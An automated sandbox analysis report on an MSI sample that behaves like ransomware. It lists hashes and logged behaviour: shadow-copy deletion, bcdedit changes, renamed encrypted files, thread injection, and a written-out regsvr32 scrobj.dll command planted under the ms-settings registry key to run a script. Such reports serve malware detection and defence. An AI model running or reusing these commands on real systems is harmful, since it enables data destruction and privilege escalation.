Analysis
-
max time kernel
193s -
max time network
205s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
22-03-2022 12:17
Static task
static1
Behavioral task
behavioral1
Sample
d1d4e29f5fca0c97cd89a4b5134d298.msi
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
d1d4e29f5fca0c97cd89a4b5134d298.msi
Resource
win10v2004-en-20220113
General
-
Target
d1d4e29f5fca0c97cd89a4b5134d298.msi
-
Size
100KB
-
MD5
aebfb88d2333ee74373a4cf582682070
-
SHA1
3d8b0dd99846144287aeeb025a5c9fc254f66fc0
-
SHA256
d1d4e29f5fca0c97cd89a4b5134d298bf2829cea92e5d116084b83d980d2c6e0
-
SHA512
9feb73d9c4902f03b94df49b3087418473dd0826480b5fde8ba3654dd8bf22bb372c8881e5254e5e8a0f6cf78bfb2d80c9060208c66478362bc6f75f12fca8cb
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 12 IoCs
pid Process 4732 bcdedit.exe 4404 bcdedit.exe 1636 bcdedit.exe 4152 bcdedit.exe 4556 bcdedit.exe 5136 bcdedit.exe 5568 bcdedit.exe 5604 bcdedit.exe 3716 bcdedit.exe 4388 bcdedit.exe 3244 bcdedit.exe 4408 bcdedit.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 8 3496 msiexec.exe 9 3496 msiexec.exe 11 3496 msiexec.exe -
pid Process 5336 wbadmin.exe 5360 wbadmin.exe 5440 wbadmin.exe 1844 wbadmin.exe 1924 wbadmin.exe 4656 wbadmin.exe -
pid Process 5208 wbadmin.exe 5328 wbadmin.exe 5256 wbadmin.exe 5640 wbadmin.exe 5536 wbadmin.exe 3516 wbadmin.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\NewEdit.raw => C:\Users\Admin\Pictures\NewEdit.raw.tjtwhzx MsiExec.exe File renamed C:\Users\Admin\Pictures\UninstallRestart.raw => C:\Users\Admin\Pictures\UninstallRestart.raw.tjtwhzx MsiExec.exe File opened for modification C:\Users\Admin\Pictures\SetPop.tiff MsiExec.exe File renamed C:\Users\Admin\Pictures\SetPop.tiff => C:\Users\Admin\Pictures\SetPop.tiff.tjtwhzx MsiExec.exe -
Loads dropped DLL 1 IoCs
pid Process 4028 MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4028 set thread context of 2316 4028 MsiExec.exe 52 PID 4028 set thread context of 2332 4028 MsiExec.exe 51 PID 4028 set thread context of 2472 4028 MsiExec.exe 16 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3a175e52-3a2b-486e-ab7e-cb310fed9ea3.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220322121845.pma setup.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Installer\1cdc67a.msi msiexec.exe File opened for modification C:\Windows\Installer\1cdc67a.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{F9FBBF96-A25A-4F7C-A937-484F62CA84D9} msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIC83F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICEC8.tmp msiexec.exe File created C:\Windows\Installer\1cdc67c.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000008a0185136d91714e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800008a0185130000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809008a018513000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008a01851300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008a01851300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3644 vssadmin.exe 364 vssadmin.exe 4880 vssadmin.exe 4892 vssadmin.exe 5444 vssadmin.exe 5736 vssadmin.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 15 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3004 msiexec.exe 3004 msiexec.exe 4028 MsiExec.exe 4028 MsiExec.exe 5000 msedge.exe 5000 msedge.exe 4436 msedge.exe 4436 msedge.exe 2020 identity_helper.exe 2020 identity_helper.exe 4536 msedge.exe 4536 msedge.exe 4536 msedge.exe 4536 msedge.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4028 MsiExec.exe 4028 MsiExec.exe 4028 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3496 msiexec.exe Token: SeIncreaseQuotaPrivilege 3496 msiexec.exe Token: SeSecurityPrivilege 3004 msiexec.exe Token: SeCreateTokenPrivilege 3496 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3496 msiexec.exe Token: SeLockMemoryPrivilege 3496 msiexec.exe Token: SeIncreaseQuotaPrivilege 3496 msiexec.exe Token: SeMachineAccountPrivilege 3496 msiexec.exe Token: SeTcbPrivilege 3496 msiexec.exe Token: SeSecurityPrivilege 3496 msiexec.exe Token: SeTakeOwnershipPrivilege 3496 msiexec.exe Token: SeLoadDriverPrivilege 3496 msiexec.exe Token: SeSystemProfilePrivilege 3496 msiexec.exe Token: SeSystemtimePrivilege 3496 msiexec.exe Token: SeProfSingleProcessPrivilege 3496 msiexec.exe Token: SeIncBasePriorityPrivilege 3496 msiexec.exe Token: SeCreatePagefilePrivilege 3496 msiexec.exe Token: SeCreatePermanentPrivilege 3496 msiexec.exe Token: SeBackupPrivilege 3496 msiexec.exe Token: SeRestorePrivilege 3496 msiexec.exe Token: SeShutdownPrivilege 3496 msiexec.exe Token: SeDebugPrivilege 3496 msiexec.exe Token: SeAuditPrivilege 3496 msiexec.exe Token: SeSystemEnvironmentPrivilege 3496 msiexec.exe Token: SeChangeNotifyPrivilege 3496 msiexec.exe Token: SeRemoteShutdownPrivilege 3496 msiexec.exe Token: SeUndockPrivilege 3496 msiexec.exe Token: SeSyncAgentPrivilege 3496 msiexec.exe Token: SeEnableDelegationPrivilege 3496 msiexec.exe Token: SeManageVolumePrivilege 3496 msiexec.exe Token: SeImpersonatePrivilege 3496 msiexec.exe Token: SeCreateGlobalPrivilege 3496 msiexec.exe Token: SeBackupPrivilege 1940 vssvc.exe Token: SeRestorePrivilege 1940 vssvc.exe Token: SeAuditPrivilege 1940 vssvc.exe Token: SeBackupPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe Token: SeTakeOwnershipPrivilege 3004 msiexec.exe Token: SeRestorePrivilege 3004 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 3496 msiexec.exe 3496 msiexec.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
